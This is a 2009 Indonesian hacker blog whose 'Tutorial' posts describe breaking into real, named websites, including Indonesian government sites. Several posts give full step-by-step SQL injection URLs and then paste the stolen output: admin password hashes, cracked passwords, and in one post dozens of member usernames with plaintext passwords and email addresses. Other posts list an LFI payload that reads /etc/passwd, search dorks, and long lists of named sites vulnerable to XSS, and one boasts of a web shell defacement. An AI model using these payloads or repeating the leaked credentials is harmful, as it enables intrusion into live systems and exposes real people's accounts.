Bryan_ae1

Jalanilah Hidup Ini Dengan Apa Adanya

Archive for the ‘Tutorial’ Category

« Previous Entries

http://langkawi-rstholidays.com

Posted by bryanae1 on November 17, 2009

pagi2 main ke js ada yg post shell web malngsial….coba ach mainan…hihihihihi…

dapat oleh2 nich :D

nich hasil karya :D

http://langkawi-rstholidays.com/index2.php

wkwkwkwkw…kabur ach :D

Posted in Tutorial | Leave a Comment »

LFI dan XSS

Posted by bryanae1 on November 1, 2009

bug : http://www.milw0rm.com/exploits/9370

http://www.zoomed.com

inurl:”/login.php?err=”

http://www.y3sfinancialservices.com
http://www.milw0rm.com/exploits/9625
http://site/path/index.php?s=../../../../../../../etc/passwd%00
http://www.daxygames.eu

http://www.daxygames.eu

http://www.lib.udel.edu/

http://www.pnet.co.za

http://www.popgroningen.nl

http://www.rochester.edu

http://www.neuland.com/

http://www.williams.edu

Posted in Tutorial | Leave a Comment »

inject kfm.depsos.go.id

Posted by bryanae1 on August 28, 2009

cek error :

http://kfm.depsos.go.id/mod.php?mod=publisher&op=viewarticle&artid=10′

1. Memeriksa jumlah Field Tabel

ketemu disini :

http://kfm.depsos.go.id/mod.php?mod=publisher&op=viewarticle&artid=10+order+by+11–

karna di :

http://kfm.depsos.go.id/mod.php?mod=publisher&op=viewarticle&artid=10+order+by+12–

menampakkan error.

2. Mengeluarkan nomor Field

ketemu disini :

http://kfm.depsos.go.id/mod.php?mod=publisher&op=viewarticle&artid=-10+union+all+select+1,2,3,4,5,6,7,8,9,10,11–

3. mengeluarkan nama-nama tabel

http://kfm.depsos.go.id/mod.php?mod=publisher&op=viewarticle&artid=-10+union+all+select+1,2,3,4,5,6,7,8,group_concat(table_name),10,11+from+information_schema.tables+where+table_schema=database()–

4. mengeluarkan nama field dari tabel yang menyimpan UserID dan Password pengguna

http://kfm.depsos.go.id/mod.php?mod=publisher&op=viewarticle&artid=-10+union+all+select+1,2,3,4,5,6,7,8,group_concat(column_name),10,11+from+information_schema.columns+where+table_name=0×617574686f7273

disini saya ambil  authors = 617574686f7273

5. mengeluarkan record-record dari tabel member

http://kfm.depsos.go.id/mod.php?mod=publisher&op=viewarticle&artid=-10+union+all+select+1,2,3,4,5,6,7,8,group_concat(aid,0×3a,name,0×3a,url,0×3a,email,0×3a,pwd,0×3a,counter),10,11+from+authors–

done :

By adminkfm:Admin Database:www.depsos.go.id:ujangth@depsos.go.id:cb688d4e30b2488b88e963f933e6f20c:4

cb688d4e30b2488b88e963f933e6f20c = tiarariska

wew kayak’na nama cewek-nya admin’na..hihihihihih

semoga sama admin’na cepetan dibetulin :D

Posted in Tutorial | 5 Comments »

XSS lagi

Posted by bryanae1 on June 11, 2009

setelah terkapar 2 hari karna something akhirnya kembali online :D

lagi lihat2  milworm dapat  bug xss: milw0rm

coba2 cari ech dapat 3 site :D :

1. www.synergiepark-stuttgart.de

2. www.skypethailand.com

3. www.lacare.org

down.

thanks : milw0rm.com

all my friends&mainhack Brotherhood

special to My mimi always miss&love u  :*

Posted in Tutorial | Leave a Comment »

XSS : inurl:/?op=mi&id=

Posted by bryanae1 on June 6, 2009

Malam Minggu Sendirian lagi kangen habis iseng2 main ke milworm nemu xss -> milw0rm.com

dapat beberapa situs :

1. www.yourpropertycyprus.com

2. www.williamsexecutiverealty.com

3.  www.theflatspecialist.co.uk

4. www.scottburghproperty.co.za

5. www.rocketproperty.com

6. www.riberacproperty.com

7. www.plumsteadproperties.co.uk

8. www.ourhomealgarve.com

9. www.oregonselectrealty.com

10. www.morvanrobins.com

11. www.mallorcabusinesscentre.com

12. www.lynchburgvarealestate.com

13. www.lowneys.com

14. www.kendalsonline.co.uk

15. www.kefalonianewhomes.co.uk

16. www.idahousing.com

17. www.home4rent.org

18. www.gobeachrealty.com

19. www.experiencebulgaria.co.uk

20. www.estherproperties.co.za

21. www.dennissheppard.com

22. www.costaholidayrentals4u.co.uk

23. www.coastalhomes.co.za

24. www.cherryproperties.co.uk

25. www.budget-estate-agents.com

26. www.balearicbusinesscentre.com

27. www.apexpropertiesgh.com

28. www.53x.net

29. edenonsearentals.co.za

30. directcaravanholidays.co.uk

31. directcaravanhire.co.uk

down.

thnaks to :

milw0rm, mainhack brotherhood, all crew #arabhack@dalnyet

special to : My Mimi Love&Miss U

Posted in Tutorial | Leave a Comment »

XSS Again

Posted by bryanae1 on June 5, 2009

Dork:  /search?q=

Site ;

1. www.zepti.org

2. www.sweetsearch.com

3. www.pondiuni.edu.in

4. www.montclair.edu

5. www.gourmet.com

6. www.givemefootball.com

7. www.clontech.com

8. www.blender.com

9. www.billingworld.com

10. www.acsh.org

11. video.bobvila.com

12. userscripts.org

13. tweetgrid.com

14. library2.ramapo.edu

15. home.pec.edu

16. etg05.itc.virginia.edu

17. dlib.etc.ucla.edu

18. culture.lookbook.nu

down.

thanks to all my friends

special to my love

Posted in Tutorial | 2 Comments »

XSS Dork inurl:/news.php?id=

Posted by bryanae1 on June 1, 2009

beberapa Yang Kena :

1. http://www.williams.edu/

2. http://www.svpressa.ru

3. http://www.programatium.com

4. http://www.obit-mag.com

5. http://www.londontravelwatch.org.uk

6. http://www.indium.com/

7. http://www.hockeyfans.ch

8. http://www.electionguide.org

9. http://www.earthfiles.com/

10. http://www.cites.org.cn

11. http://www.bbw.ro

12. http://www.alltheinternet.com

13. http://observer.sd.org.ua

Down :D

Posted in Tutorial | 1 Comment »

Sql Injection di http://ccs.my

Posted by bryanae1 on May 31, 2009

disini -> http://ccs.my/news.php?id=1561

test error :

http://ccs.my/news.php?id=1561′

yup ada error kita coba uji

: D

1. Memeriksa jumlah Field Tabel

ketemu disini :

http://ccs.my/news.php?id=1561+order+by+6–

ya karena di num 7 posisi udah false :p

2. Mengeluarkan nomor Field

ketemu disini :

http://ccs.my/news.php?id=null+union+all+select+1,2,3,4,5,6–

3. mengeluarkan informasi dari versi mysql, nama database dan nama user

http://ccs.my/news.php?id=-1561+union+all+select+1,2,concat_ws(0×2B,version(),database(),user()),4,5,6++from+information_schema.tables+where+table_schema=database()–

4. mengeluarkan nama-nama tabel

http://ccs.my/news.php?id=-1561+union+all+select+1,2,group_concat(table_name),4,5,6++from+information_schema.tables+where+table_schema=database()–

5. mengeluarkan nama field dari tabel yang menyimpan UserID dan Password pengguna

http://ccs.my/news.php?id=-1561+union+all+select+1,2,group_concat(column_name),4,5,6+from+information_schema.columns+where+table_name=0×6d656d626572

disini aku ambel dari member :D

6. mengeluarkan record-record dari tabel member

http://ccs.my/news.php?id=-1561+union+all+select+1,2,group_concat(username,0×3a,password,0×3a,email,0×3a,member),4,5,6+from+member+–

Bingo….

cwtan:213:cwtan@myccs.com:on,fkyoon:jk45gb:fkyoon@myccs.com:,xtremecom:hasegawa:klwong@lycos.com:0,kevinloh:nbv354:lohwm@varitronix.com.my:,jasonwong:vgb54n:eljkmw@pd.jaring.my:,jeffery_yeoh:sc8bq1:jeffery_yeoh@yahoo.com:0,gtlau:fv62bx:gtlau@myccs.com:0,johan:ndxm532:johan.knaepen@flits-its.be:0,mohamed:hdx43n:mohamedabdulla@msn.com:0,johnathan:jsch82d:tong_hai@hotmail.com:0,jamesgoh:s45xh2:James_Goh@maxis.net.my:0,sean:dsc23:sean@pdaexpert.info:0,phchan:ph118:poh_hoon_chan@dell.com:,pccmy:suc51f:info@pccmy.com:0,ckphuah:s45f8:ckphuah@hotmail.com:0,cg-computers:hdxe45:licg@cgcomputers.com:0,armen:h2dz52:evergreen_holidays@usa.com:,matthew:sc25×3:easycam@pd.jaring.my:0,kyzee:ds5jk7:acheronz@hotmail.com:,george:dh9n2m:georgechang79@yahoo.com:0,wooijin:wooijin:wooijin@yahoo.com:,raymond-liew:sf28b:raymond@parade-asiapac.com:0,andrewgark:sc19nv:andrewgark@hotmail.com:0,jamil:sdc739:jamil@koptech.com.my:0,irene_tew:kxn349:mtc_irene03@yahoo.com:0,chenlung:xun329:clcher@yahoo.co.jp:0,ericlim:un39xv:ericlimlh@pd.jari

thanks to :

Nocki Aka Mad’on, Temen2 Di arabhack@dal.nyet, Mainhack Brotherhood&temen2 di indohackerlink@dal.nyet&all my friends

special to mami :* love u mam

Posted in Tutorial | Leave a Comment »

XSS Dan LFI

Posted by bryanae1 on May 30, 2009

Jam segini ngak bisa tidur pala pening Iseng2

nemu dork inurl:?root=

dork lama sich

nemu situs kena xss :

lihat disini

Juga Disini

Hajar Lagi

Sikat Lagi

Untuk Yang LFi

Dork : inurl:”index.php?include_file=”

Kena LFI :

1
2
3
4

Posted in Tutorial | Leave a Comment »

Sql Injection website http://www.kpu-kotabogor.com

Posted by bryanae1 on May 30, 2009

1. Test error

bedakan antara :

http://www.kpu-kotabogor.com/mod.php?mod=publisher&op=viewarticle&artid=13

dengan ditambahi ‘ dibelakang

http://www.kpu-kotabogor.com/mod.php?mod=publisher&op=viewarticle&artid=13′

ya ada error disini dan bisa kita inject :D

2. Memeriksa jumlah Field Tabel

http://www.kpu-kotabogor.com/mod.php?mod=publisher&op=viewarticle&artid=13+order+by+11–

3. Mengeluarkan nomor Field

http://www.kpu-kotabogor.com/mod.php?mod=publisher&op=viewarticle&artid=null+union+all+select+1,2,3,4,5,6,7,8,9,10,11–

4. mengeluarkan informasi dari versi mysql, nama database dan nama user

http://www.kpu-kotabogor.com/mod.php?mod=publisher&op=viewarticle&artid=-13+union+all+select+1,2,3,concat_ws(0×2B,version(),database(),user()),5,6,group_concat(table_name),8,9,10,11+from+information_schema.tables+where+table_schema=database()–

5. mengeluarkan nama-nama tabel

http://www.kpu-kotabogor.com/mod.php?mod=publisher&op=viewarticle&artid=-13+union+all+select+1,2,3,concat_ws(0×2B,version(),database(),user()),5,6,group_concat(table_name),8,9,10,11+from+information_schema.tables+where+table_schema=database()–

6. mengeluarkan nama field dari tabel yang menyimpan UserID dan Password pengguna

http://www.kpu-kotabogor.com/mod.php?mod=publisher&op=viewarticle&artid=-13+union+all+select+1,2,3,4,5,6,group_concat(column_name),8,9,10,11+from+information_schema.columns+where+table_name=0×617574686f7273

disini saya mengambil nama tabel authors

7. mengeluarkan record-record dari tabel authors

http://www.kpu-kotabogor.com/mod.php?mod=publisher&op=viewarticle&artid=-13+union+all+select+1,2,3,4,5,6,group_concat(aid,0×3a,name,0×3a,url,0×3a,email,0×3a,pwd,0×3a,counter),8,9,10,11+from+authors%20–

Bingo :

admin:Administrator:http://www.kpu-kotabogor.com:admin@kpu-kotabogor.com:204f9a8c36fe3eeffde4ed2a7b03f16b:99

Hajar Bleh..Tapi sayang page admin ngak bisa diakses..wkwkwkwkw

Thanks To All My Friend&Mainhack Brotherhood

Special To ya2nk Miss&Love U

Posted in Tutorial | 1 Comment »

« Previous Entries